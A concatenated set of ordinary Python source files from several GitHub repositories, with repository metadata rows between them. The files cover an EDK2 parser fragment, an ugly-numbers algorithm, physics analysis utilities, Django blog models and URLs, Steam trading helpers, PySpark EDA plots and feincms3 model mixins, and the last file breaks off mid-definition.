Pcd.DefaultValue = ValueExpressionEx(Pcd.DefaultValue, Pcd.DatumType, _GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %(TokenSpaceGuid, PcdRealName, Pcd.DefaultValue, Value),
File=self.MetaFile, Line=LineNo)
break
else:
EdkLogger.error(
'build',
FORMAT_INVALID,
"PCD [%s.%s] in [%s] is not found in dependent packages:" % (TokenSpaceGuid, PcdRealName, self.MetaFile),
File=self.MetaFile, Line=LineNo,
ExtraData="\t%s" % '\n\t'.join(str(P) for P in self.Packages)
)
Pcds[PcdCName, TokenSpaceGuid] = Pcd
return Pcds
## check whether current module is binary module
@property
def IsBinaryModule(self):
if (self.Binaries and not self.Sources) or GlobalData.gIgnoreSource:
return True
return False
def ExtendCopyDictionaryLists(CopyToDict, CopyFromDict):
for Key in CopyFromDict:
CopyToDict[Key].extend(CopyFromDict[Key])
| [
"maurice.ma@intel.com"
] | maurice.ma@intel.com |
cbc29434aacb4197e0659ac27759672a36ea6776 | 6579f8ce0a7d27af6fc87d72d012a486bd889eea | /uglynumbers.py | ef4e1efe8e9e8d2cf57f596c76f682f22a074bff | [] | no_license | ankithmjain/algorithms | bbd94be6828a6e520782afd302b4faac117df1ca | fe439df150fb3830ed8f0bd3d2456dacca933663 | refs/heads/master | 2020-03-27T14:47:18.015750 | 2018-08-28T16:47:28 | 2018-08-28T16:47:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | def getNthUglyNo(n):
ugly = [0] * n # To store ugly numbers
# 1 is the first ugly number
ugly[0] = 1
# i2, i3, i5 will indicate indices for 2,3,5 respectively
i2 = i3 = i5 = 0
# set initial multiple value
next_multiple_of_2 = 2
next_multiple_of_3 = 3
next_multiple_of_5 = 5
# start loop to find value from ugly[1] to ugly[n]
for l in range(1, n):
# choose the min value of all available multiples
ugly[l] = min(next_multiple_of_2, next_multiple_of_3, next_multiple_of_5)
print ugly, i2, i3, i5
print l, next_multiple_of_2, next_multiple_of_3, next_multiple_of_5
# increment the value of index accordingly
if ugly[l] == next_multiple_of_2:
i2 += 1
next_multiple_of_2 = ugly[i2] * 2
if ugly[l] == next_multiple_of_3:
i3 += 1
next_multiple_of_3 = ugly[i3] * 3
if ugly[l] == next_multiple_of_5:
i5 += 1
next_multiple_of_5 = ugly[i5] * 5
# return ugly[n] value
return ugly
def main():
n = 20
print getNthUglyNo(n)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | ankithmjain.noreply@github.com |
beb8f00ca4461f449d82782c0683a196f2828a6a | 073c7ae30b0fbdadb3f60bdcf37940a496a3b2eb | /python/util.py | f88ba65b52323c39f073a193f6750bc183bd56c0 | [
"MIT"
] | permissive | cms-ttbarAC/CyMiniAna | 0e2a771473cf23eb931aa0ae7a015a5165f927b9 | 405b1ac6639f8a93297e847180b5a6ab58f9a06c | refs/heads/master | 2021-05-15T22:57:36.033299 | 2018-07-31T20:39:11 | 2018-07-31T20:39:11 | 106,871,363 | 0 | 1 | MIT | 2018-07-31T20:39:12 | 2017-10-13T20:41:28 | C++ | UTF-8 | Python | false | false | 5,834 | py | """
Created: --
Last Updated: 2 March 2018
Dan Marley
daniel.edison.marley@cernSPAMNOT.ch
Texas A&M University
-----
File that holds any and all misc. functions
to be called from other python scripts.
(All information in one file => one location to update!)
"""
import ROOT
import numpy as np
class Sample(object):
"""Class for holding metadata information"""
def __init__(self):
self.xsection = 1
self.sumOfWeights = 1
self.nevents = 1
self.sampleType = ""
self.primaryDataset = ""
def getHistSeparation( S, B ):
"""Compare TH1* S and B -- need same dimensions
Copied from : https://root.cern.ch/doc/master/MethodBase_8cxx_source.html#l02740
"""
separation = 0
nstep = S.GetNbinsX()
xaxis = S.GetXaxis()
nS = S.GetSumOfWeights()
nB = B.GetSumOfWeights()
for bin in range(nstep):
s = S.GetBinContent( bin+1 )/nS
b = B.GetBinContent( bin+1 )/nB
if (s+b)>0: separation += (s - b)*(s - b)/(s + b)
separation *= 0.5
return separation
def GetSeparation2D( S, B ):
"""Compare TH2* S and B -- need same dimensions"""
separation = 0
nbinsx = S.GetNbinsX()
xaxis = S.GetXaxis()
nbinsy = S.GetNbinsY()
yaxis = S.GetYaxis()
integral_s = S.Integral()
integral_b = B.Integral()
for x in range(nbinsx):
for y in range(nbinsy):
s = S.GetBinContent( x+1,y+1 )/integral_s
b = B.GetBinContent( x+1,y+1 )/integral_b
if (s+b) > 0: separation += (s - b)*(s - b)/(s + b)
separation *= 0.5
return separation
def getSeparation(sig,bkg):
"""Calculate separation between two distributions"""
separation = 0
nS = 1.0*np.sum(sig)
nB = 1.0*np.sum(bkg)
for ss,bb in zip(sig,bkg):
s = ss/nS
b = bb/nB
if (s+b) > 0: separation += (s - b)*(s - b)/(s + b)
separation *= 0.5
return separation
def read_config(filename,separation=" "):
"""
Read configuration file with data stored like:
'config option'
And the 'config' and 'option' are separated by a character, e.g., " "
"""
data = file2list(filename)
cfg = {}
for i in data:
j = i.split(separation)
cfg[j[0]] = j[1]
return cfg
def extract(str_value, start_='{', stop_='}'):
"""Extract a string between two symbols, e.g., parentheses."""
extraction = str_value[str_value.index(start_)+1:str_value.index(stop_)]
return extraction
def to_csv(filename,data):
"""Write data to CSV file"""
if not filename.endswith(".csv"): filename += ".csv"
f = open(filename,"w")
for d in data:
f.write(d)
f.close()
return
def file2list(filename):
"""Load text file and dump contents into a list"""
listOfFiles = open( filename,'r').readlines()
listOfFiles = [i.rstrip('\n') for i in listOfFiles if not i.startswith("#")]
return listOfFiles
def str2bool(param):
"""Convert a string to a boolean"""
return (param in ['true','True','1'])
def getPrimaryDataset(root_file):
"""Get the sample type given the root file"""
try:
md = root_file.Get("tree/metadata")
md.GetEntry(0)
pd = str(md.primaryDataset)
except:
pd = None
return pd
def loadMetadata(file):
"""Load metadata"""
data = file2list(file)
samples = {}
for i in data:
if i.startswith("#"): continue
items = i.split(" ")
s = Sample()
s.sampleType = items[0]
s.primaryDataset = items[1]
samples[items[1]] = s
data = Sample()
data.sampleType = 'data'
data.primaryDataset = 'data'
mujets = Sample()
mujets.sampleType = 'mujets'
mujets.primaryDataset = 'SingleMuon'
ejets = Sample()
ejets.sampleType = 'ejets'
ejets.primaryDataset = 'SingleElectron'
samples['data'] = data
samples['SingleMuon'] = mujets
samples['SingleElectron'] = ejets
return samples
class VERBOSE(object):
"""Object for handling output"""
def __init__(self):
self.verboseMap = {"DEBUG":0,
"INFO": 1,
"WARNING":2,
"ERROR": 3};
self.level = "WARNING"
self.level_int = 2
def initialize(self):
"""Setup the integer level value"""
self.level_int = self.verboseMap[self.level]
def level_value(self):
"""Return the integer value"""
return self.level_int
def DEBUG(self,message):
"""Debug level - most verbose"""
self.verbose("DEBUG",message)
return
def INFO(self,message):
"""Info level - standard output"""
self.verbose("INFO",message)
return
def WARNING(self,message):
"""Warning level - if something seems wrong but code can continue"""
self.verbose("WARNING",message)
return
def ERROR(self,message):
"""Error level - something is wrong"""
self.verbose("ERROR",message)
return
def compare(self,level1,level2=None):
"""Compare two levels"""
if level2 is None:
return self.verboseMap[level1]>=self.level_int
else:
return self.verboseMap[level1]>=self.verboseMap[level2]
def verbose(self,level,message):
"""Print message to the screen"""
if self.compare( level ):
print " {0} :: {1}".format(level,message)
return
def HELP(self):
"""Help message"""
print " CyMiniAna Deep Learning "
print " To run, execute the command: "
print " $ python python/runDeepLearning.py <config> "
print " where <config> is a text file that outlines the configuration "
## THE END ##
| [
"daniel.edison.marley@cern.ch"
] | daniel.edison.marley@cern.ch |
3637fd3e296a3f5f82d57cb07e58f56f4f0e112c | 04f3301300d5db73b311b329fa496ee3a93af1e1 | /blog_tech/blog/models.py | 03df17699e66f7164ac13260201e8b2a3c6de33f | [] | no_license | verma-varsha/blog_tech | e7f8054086fb07584ddd74f82174f11c06f654e6 | 4a054e720a2f69123ca7892f51128c5ccd106af7 | refs/heads/master | 2020-04-06T06:55:07.134852 | 2016-09-05T11:44:20 | 2016-09-05T11:44:20 | 65,595,156 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | from __future__ import unicode_literals
from django.template.defaultfilters import slugify
from django.db import models
# Create your models here.
class Tag(models.Model):
tag_title=models.CharField(max_length=100)
slug=models.SlugField(null=True)
def save(self, *args, **kwargs):
self.slug=slugify(self.tag_title)
super(Tag, self).save(*args, **kwargs)
def __unicode__(self):
return self.tag_title
class Post(models.Model):
post_title= models.CharField(max_length=150)
post_content= models.TextField()
post_content_short= models.CharField(max_length=100, null=True)
timestamp=models.DateTimeField(auto_now=False, auto_now_add=True)
author= models.CharField(max_length=100)
tag=models.ManyToManyField(Tag)
slug=models.SlugField(null=True)
image=models.FileField(null=True, blank=True)
def save(self, *args, **kwargs):
self.slug=slugify(self.post_title)
super(Post, self).save(*args, **kwargs)
def __unicode__(self):
return self.post_title
class CommentUser(models.Model):
user_name= models.CharField(max_length=150)
user_email= models.EmailField(max_length=254)
user_comment= models.TextField()
user_post=models.ForeignKey(Post, null=True)
def __unicode__(self):
return self.user_comment
| [
"varsha.verma.eee15@itbhu.ac.in"
] | varsha.verma.eee15@itbhu.ac.in |
7b144d09152b90fe9b271efb75147d60dcc5fff4 | 2e5bf9b0c6f83a63a7048b32ca544779dbe9c2a7 | /nuvo.py | 7bf80a9b2ebd20f5f78c339d57ee3ccf634440a1 | [] | no_license | stmrocket/nuvo-polyglot | 01ec9a8fe87ea802d7e017453b9d08d3f1064242 | 8366b0453694c72dc755fbffafdb65c8b8bee940 | refs/heads/master | 2021-06-13T22:39:04.597918 | 2017-05-02T02:17:03 | 2017-05-02T02:17:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,181 | py | from polyglot.nodeserver_api import SimpleNodeServer, PolyglotConnector
from nuvo_nodes import NuvoMain
VERSION = "0.0.1"
class NuvoNodeServer(SimpleNodeServer):
""" Nuvo Node Server """
zones = []
def setup(self):
super(SimpleNodeServer, self).setup()
manifest = self.config.get('manifest',{})
self.controller = NuvoMain(self, 'nuvocontroller', 'Nuvo NS', manifest, self.poly.nodeserver_config)
self.controller.add_zones()
self.poly.logger.info("FROM Poly ISYVER: " + self.poly.isyver)
self.update_config()
def poll(self):
pass
def long_poll(self):
# Future stuff
pass
def main():
# Setup connection, node server, and nodes
poly = PolyglotConnector()
# Override shortpoll and longpoll timers to 5/30, once per second in unnessesary
nserver = NuvoNodeServer(poly, shortpoll=30, longpoll=300)
poly.connect()
poly.wait_for_config()
poly.logger.info("Nuvo Interface version " + VERSION + " created. Initiating setup.")
nserver.setup()
poly.logger.info("Setup completed. Running Server.")
nserver.run()
if __name__ == "__main__":
main()
| [
"brett.hale@ticketmaster.com"
] | brett.hale@ticketmaster.com |
cd92ecd38dfe509e767b4977f1112c79d390744f | 0bfe6df147ffa74b6d2800391981273149502684 | /visionary/visionary/migrations/0002_add_model_Mindmap.py | 5ab5e8e1132a90e50d890cd2eef82b5aab730db0 | [] | no_license | lumenwrites/digitalMind_django | 829c95eca4720c2bbe71d14bdcce64e9eccd3752 | 0968f0006cf450f2796736cd604c5f6cba82147f | refs/heads/master | 2021-05-27T14:54:35.108215 | 2014-09-11T09:48:58 | 2014-09-11T09:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,903 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Mindmap'
db.create_table('visionary_mindmap', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=100, unique=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50)),
('data', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('visionary', ['Mindmap'])
def backwards(self, orm):
# Deleting model 'Mindmap'
db.delete_table('visionary_mindmap')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'db_table': "'django_content_type'", 'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType'},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'visionary.mindmap': {
'Meta': {'object_name': 'Mindmap'},
'data': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'visionary.state': {
'Meta': {'object_name': 'State'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['visionary'] | [
"raymestalez@gmail.com"
] | raymestalez@gmail.com |
d9a8d10ec7e7bd0b7885e0cffc746e6ecfe83e82 | 0e4c89041021eea295a5a9a848e330dbbeb80d9f | /server/phpcafe/urls.py | eb9da4da1ba7791219f8c5b29c883bcdc0baa54d | [] | no_license | emmanuelduv/pycafe | 2611780d960b7262f62f3d4dd023d44e9f645aae | 0eb2eadeb27a9a8bc9e2b6e9ec1a40d7b9bfb33c | refs/heads/master | 2021-01-01T05:50:39.028548 | 2013-04-07T20:13:04 | 2013-04-07T20:13:04 | 9,247,778 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,691 | py | from django.conf.urls import patterns, include, url
from django.views.generic import DetailView, ListView
from cyber.models import Vendeur, Utilisateur
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'phpcafe.views.home', name='home'),
# url(r'^phpcafe/', include('phpcafe.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^$', 'cyber.views.accueil', name='accueil'),
url(r'^admin/', include(admin.site.urls)),
url(r'^login$', 'cyber.views.login', name='login'),
url(r'^logout$', 'cyber.views.logout', name='logout'),
url(r'^session_start$', 'cyber.views.session_start'),
url(r'^session_continue$', 'cyber.views.session_continue'),
url(r'^sessions/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listSessions', name='listSessions'),
url(r'^ticket/creer$', 'cyber.views.newTicket', name='newTicket'),
url(r'^ticket/chercher/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listTickets', name='listTickets'),
url(r'^ticket/(?P<pk>\d+)/edit', 'cyber.views.editTicket', name='editTicket'),
url(r'^ticket/session_start$', 'cyber.views.ticket_session_start'),
url(r'^ticket/session_continue$', 'cyber.views.ticket_session_continue'),
url(r'^ticket/session_close$', 'cyber.views.ticket_session_close'),
url(r'^ticket/(?P<ticket_id>\d+)/sessions/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listSessionsTkt', name='listSessionsTkt'),
url(r'^ticket/(?P<ticket_id>\d+)/ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVentesTkt', name='listVentesTkt'),
url(r'^ticket/ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listTktVentes', name='listTktVentes'),
url(r'^tickets/sessions/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listTktSessions', name='listTktSessions'),
url(r'^utilisateur/creer$', 'cyber.views.newUtilisateur', name='newUtilisateur'),
# url(r'^utilisateur/(?P<pk>\d+)/modifier$', 'cyber.views.editUtilisateur'),
url(r'^utilisateur/(?P<pk>\d+)$', DetailView.as_view(model=Utilisateur,
template_name='cyber/utilisateur.html'), name='utilisateurList'),
url(r'^utilisateurs/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listUtilisateurs', name='listUtilisateurs'),
url(r'^utilisateurs/(?P<utilisateur_id>\d+)/tickets/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listUtilisateurTkt', name='listUtilisateurTkt'),
url(r'^ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVentes', name='listVentes'),
url(r'^vendeurs/$', ListView.as_view(model=Vendeur, queryset=Vendeur.objects.order_by('-id'),
template_name='cyber/vendeur_list.html'), name='vendeurList'),
url(r'^vendeur/(?P<pk>\d+)$', DetailView.as_view(model=Vendeur,
template_name='cyber/vendeur_detail.html'), name='vendeurDetail'),
url(r'^vendeur/(?P<vendeur_id>\d+)/ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVendeurVentes', name='listVendeurVentes'),
url(r'^vendeur/(?P<vendeur_id>\d+)/ventesTkt/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVendeurVentesTkt', name='listVendeurVentesTkt'),
url(r'^utilisateur/(?P<utilisateur_id>\d+)/connexions/(page(?P<page>[0-9]+)/)?$',
'cyber.views.listUtilisateurConnexions', name='listUtilisateurConnexions'),
url(r'^vendeur/(?P<pk>\d+)/modifier$', 'cyber.views.editVendeur', name='editVendeur'),
url(r'^vendeur/creer$', 'cyber.views.newVendeur', name='newVendeur'),
url(r'^vendre$', 'cyber.views.Vendre', name='Vendre'),
# url(r'^vendeur/(?P<pk>\d+)/modifier/$', ''),
)
urlpatterns += staticfiles_urlpatterns() | [
"dede@station3.(none)"
] | dede@station3.(none) |
0c724cb818b956ff13f750d4e53c877c0ac027c7 | 2668b2b72dbd510870c86b5c5d82cbae0371f4d9 | /steam_ops.py | 2cdaf24886cf3c069a0007ae0a5ade7348f1782c | [] | no_license | korrnev/ShorelineB | 1669353eaf5cb9829997206a0f3957fb6550f7f2 | 38ca6ad2236af02e3c55928af86a2cdde7f3c627 | refs/heads/master | 2023-05-14T20:07:08.588958 | 2020-04-15T07:49:50 | 2020-04-15T07:49:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,040 | py | # Core
import json
import sys
import os
import pickle
# The module, that helps to interact with the steam API
import steam # Steam WebAPI
from steampy.client import SteamClient, Asset # Steam Trades API
from steampy.utils import GameOptions
import db
import requests
USER_DATA_FOLDER = 'userdata' # Folder, where store accounts secrets and saved sessions
GAME = GameOptions.CS # This bot made only for market.csgo.com
TRADEOFFER_URL = "https://steamcommunity.com/tradeoffer/new/?partner={0}&token={1}"
LOGGED = {} # Don't use this directly, use check_or_login
# Saving session for efficiency and non-detecting purposes
def _save_session(client):
steamid = client.steam_guard['steamid']
cookies = client._session.cookies
path = os.path.join(USER_DATA_FOLDER, steamid + ".session")
with open(path, "wb") as f:
pickle.dump(cookies, f)
# Loading pickle file and create new SteamClient object and return it
def _login_from_session(steamid):
print("Logging {0} from session file".format(db.get_account_username_by_steamid(steamid)))
account = db.get_all_creds_by_steamid(steamid)
path = os.path.join(USER_DATA_FOLDER, steamid + ".session")
if not os.path.exists(path):
return None
sg_path = os.path.join(USER_DATA_FOLDER, steamid + ".json")
session = requests.session()
with open(path, 'rb') as f:
session.cookies.update(pickle.load(f))
client = SteamClient(account['steamapikey'], account['username'], account['password'], sg_path)
client._session = session
client.was_login_executed = True
if client.is_session_alive():
print("LOGGED FROM SESSION")
return client
# Logging to Steam Web API and returns SteamClient instance via steampy
# ONLY FOR check_or_login FUNCTION!!! INSTEAD OF THIS USE check_or_login
def _login(steamid):
print("Logging {0}".format(db.get_account_username_by_steamid(steamid)))
username, password, steamapikey = db.get_login_creds_by_steamid(steamid)
client = SteamClient(steamapikey)
client.login(username, password, generate_path_by_steamid(steamid))
_save_session(client)
print("LOGGED")
return client
# Login only with that function
def check_or_login(steamid):
client = _login_from_session(steamid)
if client:
LOGGED[steamid] = client
return LOGGED[steamid]
if steamid in LOGGED:
if not LOGGED[steamid].is_session_alive():
LOGGED[steamid] = _login(steamid)
else:
LOGGED[steamid] = _login(steamid)
return LOGGED[steamid]
# Generates steam64id from profile url
def steamid_from_url(url):
return steam.steamid.steam64_from_url(url)
# Generates from maFile (SDA) new file only with shared_secret,
# identity secret and steam64id
def generate_from_mafile(path):
new_data = {}
with open(path, 'r', encoding='utf-8') as f:
data = json.loads(f.read())
new_data['steamid'] = str(data['Session']['SteamID'])
new_data['shared_secret'] = data['shared_secret']
new_data['identity_secret'] = data['identity_secret']
store_filename = os.path.join(USER_DATA_FOLDER, new_data['steamid'] + '.json')
with open(store_filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(new_data, ensure_ascii=False, sort_keys=True, indent=4))
return new_data
# Helper for generate path to shared_secret file by steamid
def generate_path_by_steamid(steamid):
return os.path.join(USER_DATA_FOLDER, steamid + ".json")
# partner, token, message - are provided by tm
# items_ids == [item_assetid1, item_assetid2, ...], same provided by tm
def make_offer(steamid, partner, token, message, items_ids):
url = TRADEOFFER_URL.format(partner, token)
assets = [Asset(item_id, GAME) for item_id in items_ids]
client = check_or_login(steamid)
tradeoffer = client.make_offer_with_url(assets, [], url, message)
if tradeoffer.get('success'):
return True
else:
return False
if __name__ == '__main__':
# if not os.path.exists(USER_DATA_FOLDER):
# os.mkdir(USER_DATA_FOLDER)
# path = sys.argv[1]
# generate_from_mafile(path)
client = check_or_login("76561198983927239")
item = 'M4A1-S | Cyrex (Factory New)'
print(client.market.fetch_price(item, game=GameOptions.CS)) | [
"amgeow@gmail.com"
] | amgeow@gmail.com |
4f2e094308971e7278a9ee7bc2400e22fc046ba7 | 39023557444c7448766215bd2e29e043caf3b1df | /dsutils/evaluate.py | c28ba8dc53d9fbf06852ea7b1deb168f5d1b43d0 | [
"MIT"
] | permissive | RTJ19/dsutils_dev | 95899bd1fddafc4cb8a11f74e21abae75613957f | 92dc6f6583d80cd23a1afa935ec33df796efdc39 | refs/heads/master | 2020-08-31T13:24:34.402058 | 2019-11-30T08:06:54 | 2019-11-30T08:06:54 | 218,700,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,103 | py | import matplotlib.pyplot as plt
import pyspark.sql.functions as F
from pyspark.sql import Window
from pyspark_dist_explore import hist
from tqdm import tqdm_notebook as tqdm
def get_eda_plots(df, only_categorical=False, only_numerical=False ,\
hspace=0.5,wspace=0.5,numerical_figsize=(15,15),\
categorical_figsize=(15,25),bins=25):
"""
The function takes in a pyspark dataframe and gives subplots of numerical
labels and categorical labels.
For numerical labels it will give the histogram of the numerical values for
each label.
For categorical labels it will give percentages of each of the category in
each for each label
"""
if only_categorical != True:
numerical_labels = [item[0] for item in df.dtypes if not item[1].startswith('string')]
# print (numerical_labels)
if (len(numerical_labels) % 2) == 0:
numerical_labels2=numerical_labels
else:
numerical_labels2=numerical_labels
numerical_labels2.append(numerical_labels[-1])
print("Numerical columns has Odd number of features\n hence last subplot will be repeated")
fig = plt.figure(figsize=numerical_figsize)
fig.subplots_adjust(hspace=hspace, wspace=wspace)
print ("Plotting numerical columns...")
for column,i in tqdm(zip(numerical_labels2,range(1, len(numerical_labels2)+1)),total = len(numerical_labels2)):
ax = fig.add_subplot(round((len(numerical_labels2)/2)+0.5), 2, i)
hist(ax, x=df.select(column), bins=bins)
ax.set_title(column)
ax.legend()
if only_numerical != True:
categorical_labels = [item[0] for item in df.dtypes if item[1].startswith('string')]
# print (categorical_labels)
if (len(categorical_labels) % 2) == 0:
categorical_labels2=categorical_labels
else:
categorical_labels2=categorical_labels
categorical_labels2.append(categorical_labels[-1])
print("Categorical labels has Odd number of features\n hence last subplot will be repeated")
fig = plt.figure(figsize=(categorical_figsize))
fig.subplots_adjust(hspace=hspace, wspace=wspace)
# plt.xticks(rotation=45)
print ("Plotting categorical columns...")
for column,i in tqdm(zip(categorical_labels2,range(1, len(categorical_labels2)+1)),total = len(categorical_labels2)):
window = Window.rowsBetween(Window.unboundedPreceding,Window.unboundedFollowing)
tab = df.select([column]).\
groupBy(column).\
agg(F.count(column).alias('num'),
).\
withColumn('total',F.sum(F.col('num')).over(window)).\
withColumn('percent',F.col('num')*100/F.col('total')).\
drop(F.col('total'))
categories = [(row[column]) for row in tab.collect()]
category_percentage = [(row.percent) for row in tab.collect()]
ax = fig.add_subplot(round((len(categorical_labels2)/2)+0.5), 2, i)
ax.bar(categories, category_percentage, label="percentage")
plt.xticks(rotation=45)
ax.set_title(column)
ax.legend()
| [
"noreply@github.com"
] | RTJ19.noreply@github.com |
1a0586b543e61229aa5c7ecc3626c76951c49596 | aea3b522c0f8c6f82279cf6cc70bc11b22ef9f02 | /feincms3/mixins.py | 872c3c2269da46af9112d0eb37dba939ddbcdc59 | [
"BSD-2-Clause"
] | permissive | hancush/feincms3 | 0dfbb98f85f9bd2c2edf98cdb8de298f0188b17c | 782a4ee83a36756752b2f9aa225eed4dc402ff4c | refs/heads/master | 2020-04-04T11:55:39.289197 | 2018-10-31T18:49:47 | 2018-10-31T18:49:47 | 155,908,332 | 0 | 0 | NOASSERTION | 2018-11-02T18:44:39 | 2018-11-02T18:44:39 | null | UTF-8 | Python | false | false | 5,877 | py | # coding=utf-8
from django.conf import settings
from django.db import models
from django.db.models import signals
from django.utils.translation import activate, get_language, ugettext_lazy as _
from tree_queries.fields import TreeNodeForeignKey
from feincms3.utils import validation_error
class MenuMixin(models.Model):
"""
The ``MenuMixin`` is most useful on pages where there are menus with
differing content on a single page, for example the main navigation
and a meta navigation (containing contact, imprint etc.)
"""
menu = models.CharField(
_("menu"),
max_length=20,
blank=True,
choices=(("", ""),), # Non-empty choices for get_*_display
)
class Meta:
abstract = True
@staticmethod
def fill_menu_choices(sender, **kwargs):
"""
Fills in the choices for ``menu`` from the ``MENUS`` class variable.
This method is a receiver of Django's ``class_prepared`` signal.
"""
if issubclass(sender, MenuMixin) and not sender._meta.abstract:
field = sender._meta.get_field("menu")
field.choices = sender.MENUS
field.default = field.choices[0][0]
signals.class_prepared.connect(MenuMixin.fill_menu_choices)
class TemplateMixin(models.Model):
"""
It is sometimes useful to have different templates for CMS models such
as pages, articles or anything comparable. The ``TemplateMixin``
provides a ready-made solution for selecting django-content-editor
``Template`` instances through Django's administration interface.
"""
template_key = models.CharField(
_("template"),
max_length=100,
choices=(("", ""),), # Non-empty choices for get_*_display
)
class Meta:
abstract = True
@property
def template(self):
"""
Return the selected template instance if the ``template_key`` field
matches, or ``None``.
"""
return self.TEMPLATES_DICT.get(self.template_key)
@property
def regions(self):
"""
Return the selected template instances' ``regions`` attribute, falling
back to an empty list if no template instance could be found.
"""
return self.template.regions if self.template else []
@staticmethod
def fill_template_key_choices(sender, **kwargs):
"""
Fills in the choices for ``menu`` from the ``MENUS`` class variable.
This method is a receiver of Django's ``class_prepared`` signal.
"""
if issubclass(sender, TemplateMixin) and not sender._meta.abstract:
field = sender._meta.get_field("template_key")
field.choices = [(t.key, t.title) for t in sender.TEMPLATES]
field.default = sender.TEMPLATES[0].key
sender.TEMPLATES_DICT = {t.key: t for t in sender.TEMPLATES}
signals.class_prepared.connect(TemplateMixin.fill_template_key_choices)
class LanguageMixin(models.Model):
"""
Pages may come in varying languages. ``LanguageMixin`` helps with that.
"""
language_code = models.CharField(
_("language"),
max_length=10,
choices=settings.LANGUAGES,
default=settings.LANGUAGES[0][0],
)
class Meta:
abstract = True
def activate_language(self, request):
"""
``activate()`` the page's language and set ``request.LANGUAGE_CODE``
"""
# Do what LocaleMiddleware does.
activate(self.language_code)
request.LANGUAGE_CODE = get_language()
class RedirectMixin(models.Model):
"""
The ``RedirectMixin`` allows adding redirects in the page tree.
"""
redirect_to_url = models.CharField(_("Redirect to URL"), max_length=200, blank=True)
redirect_to_page = TreeNodeForeignKey(
"self",
